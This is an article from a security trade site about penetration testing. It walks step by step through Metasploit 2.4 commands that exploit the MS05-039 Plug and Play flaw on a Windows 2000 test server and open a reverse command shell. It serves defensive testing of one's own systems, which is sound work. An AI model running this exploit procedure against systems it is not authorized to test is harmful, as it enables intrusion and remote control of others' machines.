This tip originally appeared on SearchWindowsSecurity.com, a sister site of SearchSMB.com.
In a recent tip, I introduced the benefits of using the Metasploit Framework for security testing. The Perl-based Metasploit was designed to be a robust exploit development system. It just so happens that you can use it to run previously developed exploits against your own systems. You can use its security testing features to see if your systems vulnerable to penetration and how they react when specific payloads are sent their way.
Outside of common Web application tests such as SQL injection and input tampering which are not supported, Metasploit has exploit code for a wide range of vulnerabilities in standalone applications, Web servers, operating systems, and more -- 100 exploits and 75 payloads in version 2.4 to be exact. Version 2.5 was just released which, according the Metasploit site, includes bug fixes, cosmetic changes, and 32 more exploits! Even with over 100 exploits to choose from, obviously this isn't enough to exploit every possible vulnerability in every penetration testing scenario you come across. But then again, the framework was built so you can write your own if you're so inclined.
In this installment, I'll outline how you can use the Metasploit's built-in exploits and payloads in a real-world testing scenario. Be forewarned that it's possible to create undesired results with this tool when performing your tests such as crashing or leaving production systems in an unstable state. As with any ethical hacking venture, proceed with caution and have a contingency plan in the event something goes awry. Please don't take this lightly.
Commom Commands
Before jumping into the specific steps to execute this exploit, there are some common msfconsole commands you should know about:
The Proof's in the Penetration
Now that I've described the basic commands you'll need, let's take a look at some specif
To continue reading for free, register below or login
To read more you must become a member of SearchCIO-Midmarket.com
ic steps and screen shots required to carry out a real-world exploit.
My test target in this example is a Windows 2000 Server system that has the MS05-039 plug and play vulnerability (CVE-2005-1983) that was exploited by the Zotob worm. This hole -- which Metasploit happens to have an exploit for -- allows arbitrary code execution including shell (command prompt) access to the system. I know my target system has this vulnerability because I discovered the problem with the vulnerability assessment tool QualysGuard. This is purely a part of an ethical hacking methodology, but it's not required. You can blindly test your systems -- or, even better -- Metasploit can do some of the legwork for you with its "check" function to see if a system is vulnerable before exploiting it. More on this below. My testing system is a Windows XP SP2 system running the Metasploit Framework version 2.4 that I downloaded and installed from here. I'll use Metasploit's most commonly used msfconsole interface to demonstrate this attack.
Step 1
I load msfconsole (via Start/Programs/Metasploit Framework/MSFConsole) and its command prompt comes up:
[IMAGE]
Note: At this point you can enter show exploits to see which exploits are available for your target system.
Step 2
I enter use ms05_039_pnp to run the specific exploit which I know the system is vulnerable, and it loads up that specific exploit's environment prompt (hence the ms05_039_pnp > prompt):
[IMAGE] Step 3
I then enter show payloads to determine which payloads can be sent via this exploit:
[IMAGE] Step 4
I decide to have the exploit open up a reverse command shell, so I enter set PAYLOAD win32_reverse. I then enter show targets to determine which operating systems and applications are supported. In this case, I'll set my target to the option that supports versions of Windows 2000 Service Pack 0 (the first version of Windows 2000) thru Service Pack 4 by entering set TARGET 0:
[IMAGE] Step 5
I then enter show options to determine the non-optional exploit and payload parameters that don't have defaults and, therefore, must be set. In this case, it's the RHOST and LHOST parameters which can be set via set RHOST 10.0.0.200 and set LHOST 10.0.0.201:
[IMAGE] Step 6
I enter show options one final time to make sure everything is set correctly and then enter check to confirm that my target system is indeed vulnerable to the ms05_039_pnp vulnerability.
[IMAGE] Step 7
Finally, I enter exploit to run the exploit and send the payload to my target system -- and voila -- the connection is established and I have a command prompt on the remote system! Penetration testing at its finest:
[IMAGE]You can imagine what could happen at this point if a malicious hacker compromised your system in this way. That's why it's so important to "hack" your own systems first so you can find and plug the holes before the bad guys exploit them.
There's More to Come
This exploit is just one example of what can be done using Metasploit during penetration testing. The good thing is that outside of the specific exploit and payload I used, most of the commands and techniques in this example can apply directly to other Metasploit-supported exploits.
Once you're used to how Metasploit operates, you'll be glad to know that it contains several advanced features. You can save your "set" options, log your actions, and even define how each payload will clean up after itself once it's done running. The neat thing about Metasploit is that it's so powerful yet so easy to use. The msfconsole is very intuitive and help is always just a command away.
I encourage you to play around with Metasploit in a test environment to see for yourself what it can do. It's an enlightening proof of concept tool to say the least. If you stay plugged into the Metasploit Project's Web site, you can stay abreast of the latest framework and exploit releases. Apparently, a new and improved version of Metasploit (version 3) written in the Ruby programming language is due out soon, so be on the lookout for it as well.
It pleases me that we've got such advanced tools like Metasploit at our disposal for the betterment of information security – especially for the low, low price of $0 in this case. These types of exploit tools will certainly play a vital role in the future of improving the overall quality of software, so the more you know about them the better. With a quick Metasploit download, easy install, and a few minutes familiarizing yourself with its interface, the future is all yours.
About the author: Kevin Beaver is an independent information security consultant, author, and speaker with Atlanta-based Principle Logic, LLC. He has more than 17 years of experience in IT and specializes in performing information security assessments. Kevin has written five books including Hacking For Dummies (Wiley), Hacking Wireless Networks For Dummies, and The Practical Guide to HIPAA Privacy and Security Compliance (Auerbach). He can be reached at kbeaver @ principlelogic.com.
